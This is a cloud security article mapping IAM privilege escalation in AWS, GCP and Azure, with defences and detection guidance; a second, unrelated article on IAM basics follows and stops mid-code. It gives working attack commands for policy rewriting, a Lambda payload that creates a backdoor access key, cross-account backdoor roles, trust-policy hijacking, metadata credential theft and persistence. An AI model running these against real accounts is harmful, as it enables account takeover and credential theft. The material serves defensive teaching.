AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise





TL;DR

  • Cloud breaches are IAM events — the initial compromise is just the door; the IAM configuration determines how far an attacker goes
  • iam:PassRole with Resource: * is AWS’s single highest-risk permission — it lets any principal assign any role to any service they can create
  • iam:CreatePolicyVersion is a one-call path to full account takeover — the attacker rewrites the policy that’s already attached to them
  • iam.serviceAccounts.actAs in GCP and Microsoft.Authorization/roleAssignments/write in Azure are direct equivalents — same threat model, different syntax
  • Enforce IMDSv2 on EC2; disable SA key creation in GCP; restrict role assignment scope in Azure
  • Alert on IAM mutations — they are low-volume, high-signal events that should never be silent

The Big Picture

  AWS IAM PRIVILEGE ESCALATION — HOW LIMITED ACCESS BECOMES FULL COMPROMISE

  Initial credential (exposed key, SSRF to IMDS, phished session)
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  DISCOVERY (read-only, often undetected)                        │
  │  get-caller-identity · list-attached-policies · get-policy     │
  │  Result: attacker maps their permission surface in < 15 min    │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PRIVILEGE ESCALATION — pick one path that's open:             │
  │                                                                 │
  │  iam:CreatePolicyVersion  →  rewrite your own policy to *:*    │
  │  iam:PassRole + lambda    →  invoke code under AdminRole       │
  │  iam:CreateRole +                                              │
  │    iam:AttachRolePolicy   →  create and arm a backdoor role    │
  │  iam:UpdateAssumeRolePolicy → hijack an existing admin role    │
  │  SSRF → IMDS              →  steal instance role credentials   │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PERSISTENCE (before incident response begins)                  │
  │  Create hidden IAM user · cross-account backdoor role          │
  │  Add personal account at org level (GCP)                       │
  │  These survive: password resets, key rotation, even            │
  │  deletion of the original compromised credential               │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  Impact: data exfiltration · destruction · ransomware · mining

AWS IAM privilege escalation follows a consistent pattern across almost every significant cloud breach: a limited initial credential, a chain of IAM permissions that expand access, and damage that’s proportional to how much room the IAM design gave the attacker to move. This episode maps the paths — as concrete techniques with specific permissions, because defending against them requires understanding exactly what they exploit.


Introduction

AWS IAM privilege escalation turns misconfigured permissions into full account compromise, and the entry point is rarely the attack that matters. In 2019, Capital One suffered a breach that exposed over 100 million customer records. The attacker didn’t find a zero-day. They exploited an SSRF vulnerability in a misconfigured web application firewall, reached the EC2 instance metadata service, and retrieved temporary credentials for the instance’s IAM role. According to the public court filings, that role was far broader than a firewall needed: it could list and read S3 buckets containing customer data.

The SSRF got the attacker a foothold. The IAM design determined how far they could go.

This is the pattern across almost every significant cloud breach: a limited initial credential, followed by a privilege escalation path through IAM, followed by the actual damage. The damage is determined not by the sophistication of the initial compromise but by how much room the IAM configuration gives an attacker to move.

This episode maps the paths. Not as theory — as concrete techniques with specific permissions, because understanding exactly what an attacker can do with a specific IAM misconfiguration is the only way to prioritize what to fix. The defensive controls are listed alongside each path because that’s where they’re most useful.


The Attack Chain

Most cloud account compromises follow a consistent pattern:

Initial Access
  (compromised credential — exposed access key, SSRF to IMDS,
   compromised developer workstation, phished IdP session)
    │
    ▼
Discovery
  (what am I? what can I do? what can I reach?)
    │
    ▼
Privilege Escalation
  (use existing permissions to gain more permissions)
    │
    ▼
Lateral Movement
  (access other accounts, services, resources)
    │
    ▼
Persistence
  (create backdoor identities that survive credential rotation)
    │
    ▼
Impact
  (data exfiltration, destruction, ransomware, crypto mining)

Understanding this chain tells you where to put defensive controls. You can cut the chain at any link. The earlier the better — but it’s better to have multiple cuts than to assume a single control holds.


Phase 1: Discovery — An Attacker’s First Steps

The moment an attacker has any cloud credential, they enumerate. This is low-noise, uses only read permissions, and in many environments goes completely undetected:

# AWS: establish identity
aws sts get-caller-identity
# Returns: Account, UserId, Arn — tells the attacker what they're working with

# Enumerate attached policies
aws iam list-attached-user-policies --user-name alice
aws iam list-user-policies --user-name alice
aws iam list-groups-for-user --user-name alice
aws iam list-attached-role-policies --role-name LambdaRole

# Read the actual policy document
aws iam get-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevAccess \
  --version-id v1

# Survey what's accessible
aws s3 ls
aws ec2 describe-instances --output table
aws secretsmanager list-secrets
aws ssm describe-parameters

# GCP: establish identity and permissions
gcloud auth list
gcloud projects get-iam-policy PROJECT_ID --format=json | \
  jq '.bindings[] | select(.members[] | contains("USER_EMAIL"))'

# Test specific permissions
gcloud projects test-iam-permissions PROJECT_ID \
  --permissions="storage.objects.list,iam.roles.create,iam.serviceAccountKeys.create"

# Azure: establish context
az account show
az role assignment list --assignee USER_EMAIL --all --output table

All of this is read-only. In most environments I’ve reviewed, there are no alerts on this activity unless the calls come from an unusual IP or at an unusual time. An attacker comfortable with the AWS CLI can map the permission surface of a compromised credential in 10–15 minutes.


AWS Privilege Escalation Paths

Path 1: iam:CreatePolicyVersion

The most direct path. If a principal can create a new version of a policy attached to themselves, they can rewrite it to grant anything.

# Attacker has iam:CreatePolicyVersion on a policy attached to their own role
aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
  }' \
  --set-as-default
# Result: DevPolicy now grants AdministratorAccess to everyone with it attached

The attacker doesn’t need to create new infrastructure. They inject admin access directly into their existing permission set. This is often undetected by basic monitoring because CreatePolicyVersion is a low-frequency legitimate operation.

Defence: Alert on every CreatePolicyVersion call. Restrict the permission to a dedicated break-glass IAM role. Use permissions boundaries on developer roles to cap the maximum permissions they can ever hold.
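To make the permissions-boundary idea concrete, here is a minimal Python sketch. It assumes policies can be reduced to plain sets of action names with no wildcards, conditions, or explicit denies (real IAM evaluation is richer). The function name `effective_actions` and both sample sets are hypothetical, chosen only for illustration.

```python
def effective_actions(identity_allows: set[str], boundary_allows: set[str]) -> set[str]:
    """Return the actions a bounded role can actually use.

    An action must be allowed by BOTH the identity policy and the
    permissions boundary, so the result is a set intersection.
    """
    return identity_allows & boundary_allows


# Hypothetical developer role whose identity policy was rewritten to include IAM writes
identity_policy = {
    "s3:GetObject",
    "lambda:InvokeFunction",
    "iam:CreateUser",
    "iam:AttachUserPolicy",
}

# Hypothetical boundary: the most this role may ever hold
boundary = {"s3:GetObject", "s3:PutObject", "lambda:InvokeFunction"}

# The injected IAM actions drop out because the boundary never allowed them
print(sorted(effective_actions(identity_policy, boundary)))
```

Under these assumptions, a rewritten policy version still cannot grant anything the boundary excludes, which is why the boundary is worth having even when CreatePolicyVersion is tightly restricted.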

Path 2: iam:PassRole + Service Creation

iam:PassRole allows an identity to assign an IAM role to an AWS service. This is legitimate and necessary — it’s how you configure “this Lambda function runs with this role.” The attack vector: if a more powerful role exists in the account, and the attacker can pass it to a service they control and invoke that service, they operate with the more powerful role’s permissions.

# Attacker has: lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
# They know an existing AdminRole exists (discovered during enumeration)

# Create a Lambda that runs with AdminRole
aws lambda create-function \
  --function-name exfil-fn \
  --runtime python3.12 \
  --role arn:aws:iam::123456789012:role/AdminRole \
  --handler index.handler \
  --zip-file fileb://payload.zip

# Invoke — code now executes with AdminRole's permissions
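aws lambda invoke --function-name exfil-fn /tmp/output.json

# index.py (packaged in payload.zip)
import boto3

def handler(event, context):
    # Running as AdminRole
    s3 = boto3.client('s3')
    buckets = s3.list_buckets()

    # Create a backdoor access key while we have elevated access
    # (assumes an IAM user named backdoor-user already exists)
    iam = boto3.client('iam')
    key = iam.create_access_key(UserName='backdoor-user')

    # Return only string fields: the raw response holds a datetime (CreateDate)
    # that the Lambda runtime cannot serialise to JSON
    return {
        "buckets": [b['Name'] for b in buckets['Buckets']],
        "key_id": key['AccessKey']['AccessKeyId'],
    }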

Defence: Scope iam:PassRole to specific role ARNs — never Resource: *. Example:

{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/LambdaExecutionRole-*"
}
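One way to audit for the unscoped form is to scan policy documents for Allow statements that pair iam:PassRole with Resource "*". The sketch below is a simplified check, not a full policy parser: it assumes the policy is already loaded as a Python dict, matches only the literal actions `iam:PassRole`, `iam:*`, and `*`, and ignores NotAction, conditions, and partial wildcards such as `iam:Pass*`. The function names and sample policies are hypothetical.

```python
def as_list(value):
    """IAM accepts a single value or a list for Statement/Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def wildcard_passrole_statements(policy_document: dict) -> list:
    """Return Allow statements that grant iam:PassRole on Resource "*"."""
    risky = []
    for stmt in as_list(policy_document.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        # IAM action names are case-insensitive, so compare in lower case
        actions = [a.lower() for a in as_list(stmt.get("Action", []))]
        resources = as_list(stmt.get("Resource", []))
        grants_passrole = any(a in ("iam:passrole", "iam:*", "*") for a in actions)
        if grants_passrole and "*" in resources:
            risky.append(stmt)
    return risky


# Hypothetical policies for illustration
scoped = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": "iam:PassRole",
        "Resource": "arn:aws:iam::123456789012:role/LambdaExecutionRole-*",
    }],
}
wildcard = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["lambda:CreateFunction", "iam:PassRole"],
        "Resource": "*",
    }],
}

print(len(wildcard_passrole_statements(scoped)))    # scoped policy: nothing flagged
print(len(wildcard_passrole_statements(wildcard)))  # wildcard policy: one statement flagged
```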

Path 3: iam:CreateRole + iam:AttachRolePolicy

If an attacker can both create a role and attach policies to it, they create a backdoor identity:

# Create a role with a trust policy naming an attacker-controlled principal
aws iam create-role \
  --role-name BackdoorRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'

# Attach AdministratorAccess
aws iam attach-role-policy \
  --role-name BackdoorRole \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Assume it from the attacker's account — persistent cross-account access
aws sts assume-role \
  --role-arn arn:aws:iam::TARGET_ACCOUNT:role/BackdoorRole \
  --role-session-name persistent-access

This is persistence, not just escalation — the backdoor survives password resets, access key rotation, even deletion of the original compromised credential.

Path 4: iam:UpdateAssumeRolePolicy

If an existing high-privilege role already exists, modifying its trust policy to allow the attacker’s principal is faster and quieter than creating a new role:

# Add attacker's principal to the trust policy of an existing AdminRole
aws iam update-assume-role-policy \
  --role-name ExistingAdminRole \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"},
      {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"}, "Action": "sts:AssumeRole"}
    ]
  }'

The original entry remains intact. A casual review might miss the addition. Trust policy changes should be critical-priority alerts.
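Because the added entry sits next to a legitimate one, a diff against a known-good baseline is easier to trust than a visual review. The following Python sketch assumes you keep an approved set of (principal type, value) pairs per role; that baseline and the function names are hypothetical, and conditions in the trust policy are ignored.

```python
def trust_principals(trust_policy: dict) -> set:
    """Flatten every Allow statement's Principal into (type, value) pairs."""
    pairs = set()
    statements = trust_policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        if principal == "*":  # wildcard principal: anyone may assume the role
            pairs.add(("*", "*"))
            continue
        for kind, values in principal.items():
            for value in values if isinstance(values, list) else [values]:
                pairs.add((kind, value))
    return pairs


def unexpected_principals(trust_policy: dict, approved: set) -> set:
    """Return principals present in the trust policy but missing from the baseline."""
    return trust_principals(trust_policy) - approved


# The modified trust policy from the example above
modified = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"},
        {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"}, "Action": "sts:AssumeRole"},
    ],
}
# Hypothetical baseline: only EC2 is supposed to assume this role
approved = {("Service", "ec2.amazonaws.com")}

print(unexpected_principals(modified, approved))
```

The same comparison can run against the output of `aws iam get-role --query 'Role.AssumeRolePolicyDocument'` on a schedule, so an added principal surfaces even if the alert on the API call was missed.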

Path 5: SSRF to EC2 Instance Metadata

The Capital One path. Any SSRF vulnerability in a web application running on EC2 can retrieve the instance role’s credentials from the metadata service:

Attacker → SSRF → GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
→ Returns role name
→ GET http://169.254.169.254/latest/meta-data/iam/security-credentials/MyAppRole
→ Returns: AccessKeyId, SecretAccessKey, Token (valid up to 6 hours)

Defence: IMDSv2 requires a PUT request first, blocking simple GET-based SSRF:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {"ec2:MetadataHttpTokens": "required"}
  }
}
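To see why IMDSv2 blunts GET-only SSRF, it helps to look at the two requests a legitimate client has to make. The Python sketch below only constructs the requests with the standard library and does not send them; the helper names are hypothetical. The endpoint paths and header names are the documented IMDSv2 ones.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """Step 1: a PUT that asks IMDSv2 for a session token."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def metadata_request(path: str, token: str) -> urllib.request.Request:
    """Step 2: a GET that must carry the token obtained in step 1."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )


step1 = token_request()
step2 = metadata_request("iam/security-credentials/", "TOKEN_FROM_STEP_1")
print(step1.get_method(), step1.full_url)
print(step2.get_method(), step2.full_url)
```

An SSRF primitive that can only make the vulnerable server issue a GET to an attacker-chosen URL cannot perform step 1 or attach the custom header in step 2. On an actual instance, the requests would be sent with `urllib.request.urlopen(step1, timeout=2)`.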

High-Risk AWS Permissions Reference

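┌────────────────────────────────────────────────┬─────────────────────────────────────────────────────────────────────────────┐
│ Permission                                     │ Why It’s Dangerous                                                          │
├────────────────────────────────────────────────┼─────────────────────────────────────────────────────────────────────────────┤
│ iam:PassRole with Resource: *                  │ Assign any role to any service; enables immediate privilege escalation      │
│ iam:CreatePolicyVersion                        │ Rewrite any policy to grant anything; full account takeover in one API call │
│ iam:AttachRolePolicy                           │ Attach AdministratorAccess to any role                                      │
│ iam:UpdateAssumeRolePolicy                     │ Add any principal to any role’s trust policy                                │
│ iam:CreateAccessKey on other users             │ Create persistent credentials for any IAM user                              │
│ lambda:UpdateFunctionCode on privileged Lambda │ Inject malicious code into an elevated function                             │
│ secretsmanager:GetSecretValue with Resource: * │ Read every secret in the account                                            │
│ ssm:GetParameter with Resource: *              │ Read all Parameter Store values, which often contain credentials            │
│ iam:CreateRole + iam:AttachRolePolicy          │ Create and arm a backdoor role                                              │
└────────────────────────────────────────────────┴─────────────────────────────────────────────────────────────────────────────┘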

GCP Privilege Escalation Paths

iam.serviceAccounts.actAs

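GCP’s closest equivalent of iam:PassRole. It lets an identity attach a service account to a resource it creates (a VM, a Cloud Function, a Cloud Run service), so code on that resource runs as the service account. When the identity also holds iam.serviceAccounts.getAccessToken (roles/iam.serviceAccountTokenCreator), it can skip the resource entirely and impersonate the account directly:

# Attacker can mint tokens for an admin SA (requires iam.serviceAccounts.getAccessToken)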
gcloud --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com \
  iam roles list --project=my-project

# Generate a full access token and call any GCP API as admin-sa
gcloud auth print-access-token \
  --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com

iam.serviceAccountKeys.create

Converts a short-lived identity into a persistent one. Create a key for an admin service account and you have indefinite access:

gcloud iam service-accounts keys create admin-key.json \
  --iam-account=SA_EMAIL
# Valid until explicitly deleted; no expiry by default

# Block this at org level (write the policy to a file, then apply it)
cat > disable-sa-keys.yaml << 'EOF'
name: organizations/ORG_ID/policies/iam.disableServiceAccountKeyCreation
spec:
  rules:
    - enforce: true
EOF
gcloud org-policies set-policy disable-sa-keys.yaml

Azure Privilege Escalation Paths

Microsoft.Authorization/roleAssignments/write

If an identity can write role assignments, it can grant itself Owner at any scope it can write to:

az role assignment create \
  --assignee USER_EMAIL \
  --role "Owner" \
  --scope /subscriptions/SUB_ID

Managed Identity Assignment

Attach a high-privilege managed identity to a VM the attacker controls, then retrieve its token via IMDS:

az vm identity assign \
  --name attacker-vm --resource-group rg-attacker \
  --identities /subscriptions/SUB/resourcegroups/rg-prod/providers/\
Microsoft.ManagedIdentity/userAssignedIdentities/admin-identity

# From inside the VM
# (URL kept on one line: a backslash-newline inside single quotes is not a line continuation)
curl -H 'Metadata: true' \
  'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'

Persistence — How Attackers Outlast Incident Response

# AWS: hidden IAM user with admin access
aws iam create-user --user-name svc-backup-01
aws iam attach-user-policy \
  --user-name svc-backup-01 \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name svc-backup-01
# Valid until manually deleted — survives key rotation on other identities

# AWS: cross-account backdoor, hardest to find during IR
aws iam create-role --role-name svc-monitoring-role \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'
aws iam attach-role-policy --role-name svc-monitoring-role \
  --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess

# GCP: add personal account at org level, survives project deletion
gcloud organizations add-iam-policy-binding ORG_ID \
  --member="user:ATTACKER_EMAIL" --role="roles/owner"

Cross-account backdoors are particularly resilient — incident responders often focus on the compromised account without auditing trust relationships with external accounts.


Detection — What to Alert On

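┌───────────────────────────────────────────────┬─────────────────────────────────────────────┬──────────┐
│ Activity                                      │ Event to Watch                              │ Priority │
├───────────────────────────────────────────────┼─────────────────────────────────────────────┼──────────┤
│ Role trust policy modified                    │ UpdateAssumeRolePolicy                      │ Critical │
│ New IAM user created                          │ CreateUser                                  │ High     │
│ Policy version created                        │ CreatePolicyVersion                         │ High     │
│ Policy attached to role                       │ AttachRolePolicy, PutRolePolicy             │ High     │
│ SA key created (GCP)                          │ google.iam.admin.v1.CreateServiceAccountKey │ High     │
│ Role assignment at subscription scope (Azure) │ roleAssignments/write at /subscriptions/    │ Critical │
│ CloudTrail logging disabled                   │ StopLogging, DeleteTrail                    │ Critical │
│ GetSecretValue at unusual hours               │ secretsmanager:GetSecretValue               │ Medium   │
└───────────────────────────────────────────────┴─────────────────────────────────────────────┴──────────┘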

IAM events are low-volume in most accounts. That makes anomaly detection straightforward — a spike in IAM API calls outside business hours from an unusual principal is a strong signal. Configure the critical-priority events as real-time alerts, not just logged events.
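As a rough illustration of turning these priorities into alerts, the Python sketch below triages already-parsed CloudTrail records. It assumes each record is a dict carrying the standard `eventName` and `userIdentity.arn` fields; the mapping covers only the AWS events with Critical or High priority, and the `triage` function and sample records are hypothetical.

```python
# Priorities for the AWS IAM and CloudTrail mutations worth a real-time alert
ALERT_PRIORITY = {
    "UpdateAssumeRolePolicy": "Critical",
    "StopLogging": "Critical",
    "DeleteTrail": "Critical",
    "CreateUser": "High",
    "CreatePolicyVersion": "High",
    "AttachRolePolicy": "High",
    "PutRolePolicy": "High",
}


def triage(events: list) -> list:
    """Return (priority, eventName, principal ARN) tuples, Critical first."""
    order = {"Critical": 0, "High": 1}
    hits = []
    for event in events:
        priority = ALERT_PRIORITY.get(event.get("eventName"))
        if priority is None:
            continue  # read-only or unrelated call: not an IAM mutation we alert on
        arn = event.get("userIdentity", {}).get("arn", "unknown")
        hits.append((priority, event["eventName"], arn))
    # sorted() is stable, so events keep their original order within a priority
    return sorted(hits, key=lambda hit: order[hit[0]])


# Hypothetical records for illustration
sample = [
    {"eventName": "ListBuckets", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}},
    {"eventName": "CreatePolicyVersion", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}},
    {"eventName": "UpdateAssumeRolePolicy", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}},
]

for hit in triage(sample):
    print(hit)
```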


⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — "We have SCPs, so individual role permissions       ║
║       don't matter as much"                                          ║
║                                                                      ║
║  SCPs set the ceiling. If an SCP allows iam:PassRole, any role      ║
║  with that permission can exploit it regardless of how "scoped"     ║
║  the SCP looks. SCPs and role-level permissions both need to be     ║
║  reviewed — they are independent layers.                            ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary doesn't stop iam:PassRole     ║
║                                                                      ║
║  A permissions boundary caps what a role can do directly. It does   ║
║  NOT prevent that role from passing a more powerful role to a       ║
║  Lambda or EC2. iam:PassRole escalation bypasses the boundary       ║
║  because the attacker is operating through the service, not         ║
║  directly through the bounded role.                                 ║
║                                                                      ║
║  Fix: scope iam:PassRole to specific ARNs regardless of whether     ║
║  a permissions boundary is in place.                                ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — CloudTrail doesn't log data plane events by default ║
║                                                                      ║
║  S3 object reads (GetObject) and Lambda invocations are data events: ║
║  CloudTrail does not record them unless you explicitly enable Data   ║
║  Events, so S3 exfiltration leaves no trace in a default setup.      ║
║  GetSecretValue and SSM GetParameter are read-only management        ║
║  events: logged by default, but lost if a trail is set to            ║
║  write-only management events.                                       ║
║                                                                      ║
║  Fix: enable S3 and Lambda data events in CloudTrail, and keep       ║
║  read management events enabled so secret reads stay visible.        ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌──────────────────────────────────┬──────────────────────────────────────────────────────┐
│ Permission                       │ Escalation Path                                      │
├──────────────────────────────────┼──────────────────────────────────────────────────────┤
│ iam:CreatePolicyVersion          │ Rewrite your own policy to grant *:*                 │
│ iam:PassRole (Resource: *)       │ Assign AdminRole to a Lambda/EC2 you control         │
│ iam:CreateRole+AttachRolePolicy  │ Create and arm a backdoor cross-account role         │
│ iam:UpdateAssumeRolePolicy       │ Hijack existing admin role's trust policy            │
│ iam.serviceAccounts.actAs (GCP)  │ Impersonate any service account including admins     │
│ iam.serviceAccountKeys.create    │ Generate permanent key for any SA                    │
│ roleAssignments/write (Azure)    │ Assign Owner to yourself at subscription scope       │
└──────────────────────────────────┴──────────────────────────────────────────────────────┘

Defensive commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS: dump each customer-managed policy's default version, then review for           │
│  # iam:PassRole on Resource: *                                                         │
│  aws iam list-policies --scope Local \                                                 │
│    --query 'Policies[*].[Arn,DefaultVersionId]' --output text | \                      │
│    while read -r arn ver; do aws iam get-policy-version --policy-arn "$arn" \          │
│      --version-id "$ver" --query 'PolicyVersion.Document'; done                        │
│                                                                                        │
│  # AWS — check who can assume a given role                                            │
│  aws iam get-role --role-name AdminRole \                                             │
│    --query 'Role.AssumeRolePolicyDocument'                                            │
│                                                                                        │
│  # AWS — simulate whether a principal can CreatePolicyVersion                        │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/DevRole \                           │
│    --action-names iam:CreatePolicyVersion \                                           │
│    --resource-arns arn:aws:iam::ACCOUNT:policy/DevPolicy                             │
│                                                                                        │
│  # GCP — check who has actAs on a service account                                    │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL \                               │
│    --format=json | jq '.bindings[] | select(.role=="roles/iam.serviceAccountUser")'  │
│                                                                                        │
│  # GCP — list service account keys (find persistent backdoors)                       │
│  gcloud iam service-accounts keys list --iam-account=SA_EMAIL                        │
│                                                                                        │
│  # Azure — list all role assignments at subscription scope                           │
│  az role assignment list --scope /subscriptions/SUB_ID --output table                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

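┌────────────────┬─────────────────────────────────────────────┬──────────────────────────────────────────────────────────┐
│ Framework      │ Reference                                   │ What It Covers Here                                      │
├────────────────┼─────────────────────────────────────────────┼──────────────────────────────────────────────────────────┤
│ CISSP          │ Domain 6: Security Assessment and Testing   │ IAM attack paths are the foundation of cloud penetration │
│                │                                             │ testing and access review methodology                    │
│ CISSP          │ Domain 5: Identity and Access Management    │ Defensive IAM design requires understanding offensive    │
│                │                                             │ technique; you cannot protect paths you don’t know exist │
│ ISO 27001:2022 │ 8.8 Management of technical vulnerabilities │ IAM misconfigurations are technical vulnerabilities:     │
│                │                                             │ identifying and remediating privilege escalation paths   │
│ ISO 27001:2022 │ 8.16 Monitoring activities                  │ Detection signals and alerting on IAM mutations as part  │
│                │                                             │ of continuous monitoring                                 │
│ SOC 2          │ CC7.1                                       │ Threat and vulnerability identification: this episode    │
│                │                                             │ maps the threat model for cloud IAM                      │
│ SOC 2          │ CC6.1                                       │ Understanding attack paths informs the design of logical │
│                │                                             │ access controls that actually hold                       │
└────────────────┴─────────────────────────────────────────────┴──────────────────────────────────────────────────────────┘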

Key Takeaways

  • Cloud breaches are IAM events — the initial compromise is just the door; IAM misconfigurations determine how far an attacker can go
  • iam:PassRole with Resource: * is AWS’s highest-risk single permission — scope it to specific role ARNs or the escalation paths multiply
  • iam:CreatePolicyVersion and iam:UpdateAssumeRolePolicy are privilege escalation and persistence primitives — restrict them to dedicated admin roles
  • iam.serviceAccounts.actAs in GCP and roleAssignments/write in Azure are direct equivalents — same threat model, cloud-specific syntax
  • Enforce IMDSv2 on EC2; disable SA key creation org-wide in GCP; restrict role assignment scope in Azure
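  • Enable CloudTrail Data Events: default logging misses S3 object reads and Lambda invocations entirely. Secrets Manager and SSM parameter reads are read-only management events, so make sure your trails do not filter those out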
  • Alert on IAM mutations — low-volume, high-signal events that should never go unmonitored

What’s Next

You now know how attackers move through misconfigured IAM. AWS least privilege audit is the defensive counterpart — using Access Analyzer, GCP IAM Recommender, and Azure Access Reviews to find and right-size over-permissioned access before an attacker does. The goal: get from wildcard policies to scoped, auditable permissions without breaking production.

Next: AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies


What Is Cloud IAM — and Why Every API Call Depends on It





TL;DR

  • Cloud IAM is the system that decides whether any API call is allowed or denied — deny by default, explicit Allow required at every layer
  • Every API call answers four questions: Who? (Identity) What? (Action) On what? (Resource) Under what conditions? (Context)
  • Two identity types in every cloud account: human (engineers) and machine (Lambda, EC2, Kubernetes pods) — machine identities outnumber human by 10:1 in most production environments
  • AWS, GCP, and Azure share the same model: deny-by-default, policy-driven, principal-based — different syntax, same mental model
  • The gap between granted and used permissions is where attackers move — the average IAM entity uses under 5% of its granted permissions
  • IAM failure has two modes: over-permissioned (“it works”) and over-restricted (“it’s secure, engineers work around it”) — both end in incidents

The Big Picture

                        WHAT IS CLOUD IAM?

  Every API call in AWS, GCP, or Azure answers four questions:

  ┌─────────────┐   ┌─────────────┐   ┌─────────────┐   ┌─────────────┐
  │    WHO?     │   │   WHAT?     │   │  ON WHAT?   │   │  UNDER      │
  │             │   │             │   │             │   │  WHAT?      │
  │  Identity / │   │  Action /   │   │  Resource   │   │             │
  │  Principal  │   │  Permission │   │             │   │  Condition  │
  │             │   │             │   │             │   │             │
  │ IAM Role    │   │ s3:GetObject│   │ arn:aws:s3: │   │ MFA: true   │
  │ Svc Account │   │ ec2:Start   │   │ ::prod-data │   │ IP: 10.0/8  │
  │ Managed     │   │ iam:        │   │ /exports/*  │   │ Time: 09-17 │
  │ Identity    │   │   PassRole  │   │             │   │             │
  └─────────────┘   └─────────────┘   └─────────────┘   └─────────────┘
        └────────────────┴────────────────┴────────────────┘
                                  │
                     ┌────────────▼────────────┐
                     │    IAM Policy Engine    │
                     │    deny by default      │
                     │                         │
                     │  Explicit ALLOW?   ─────┼──→  PERMIT
                     │  Explicit DENY?    ─────┼──→  DENY (overrides Allow)
                     │  No matching rule? ─────┼──→  DENY (implicit)
                     └─────────────────────────┘

Cloud IAM is the answer to a question every growing infrastructure team hits: at scale, how do you know who can do what, why they can do it, and whether they still should?


Introduction

Cloud IAM (Identity and Access Management) is the control plane for access in every major cloud provider. Every API call — reading a file, starting an instance, invoking a function — goes through an IAM evaluation. The result is binary: explicit Allow or deny. There is no implicit access. Nothing is open by default. This is what makes cloud IAM fundamentally different from the access models that came before it.
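The deny-by-default rule can be sketched in a few lines of Python. This is a deliberately simplified model, not any provider's real engine: it assumes each statement has a single Action and Resource pattern, uses shell-style `*` wildcards via `fnmatchcase`, and ignores principals, conditions, boundaries, and organisation-level policies. The `evaluate` function and the sample statements are hypothetical.

```python
from fnmatch import fnmatchcase


def evaluate(statements: list, action: str, resource: str) -> str:
    """Evaluate one request against a list of policy statements.

    Order of precedence: an explicit Deny always wins, an explicit Allow
    permits, and anything unmatched falls through to the implicit deny.
    """
    decision = "DENY (implicit)"
    for stmt in statements:
        matches = fnmatchcase(action, stmt["Action"]) and fnmatchcase(resource, stmt["Resource"])
        if not matches:
            continue
        if stmt["Effect"] == "Deny":
            return "DENY (explicit)"  # overrides any Allow, seen or not yet seen
        decision = "PERMIT"
    return decision


# Hypothetical statements for illustration
statements = [
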